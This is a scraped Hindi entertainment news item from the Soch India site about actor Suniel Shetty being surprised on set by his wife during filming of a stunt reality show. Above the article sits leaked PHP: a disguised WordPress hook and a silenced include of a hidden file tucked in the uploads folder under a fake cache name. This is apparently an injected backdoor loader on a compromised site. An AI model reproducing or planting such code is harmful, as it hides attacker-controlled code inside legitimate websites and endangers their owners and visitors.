add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सेट पर सुनील शेट्टी की अपनी पत्नी से अचानक मुलाकात – SOCH INDIA
Menu

मनोरंजन
सेट पर सुनील शेट्टी की अपनी पत्नी से अचानक मुलाकात

nobanner

भिनेता सुनील शेट्टी अपने नए टीवी शो की शूटिंग के दौरान सेट पर अपनी पत्नी माना को अचानक देखकर आश्चर्य में पड़ गए. अभिनेता इस समय रियलिटी स्टंट शो ‘इंडियाज असली चैंपियन..है दम’ की शूटिंग कर रहे हैं. सुनील ने ट्वीट किया, “जब पत्नी अचानक सेट पर पहुंचीं और ‘इंडियाज असली चैंपियन’ के बच्चों के ‘दम’ को देखकर हैरत में पड़ गईं!”

सुनील इस शो के साथ पर्दे पर वापसी कर रहे हैं. इससे पहले वह 2014 की फिल्म ‘द शौकीन्स’ में अतिथि कलाकार की भूमिका में दिखे थे.

सुनील ने एक वीडिया भी साझा किया जिसमें उन्होंने अपनी वापसी पर उनके इतने अच्छे स्वागत के लिए लोगों का धन्यवाद दिया.

उन्होंने ट्वीट किया, “आपके द्वारा इतने अच्छे स्वागत पर आभार जताने के लिए मेरे पास पर्याप्त शब्द नहीं है, लेकिन फिर भी शब्द ही हैं जो आभार जता सकते हैं-आपका धन्यवाद.”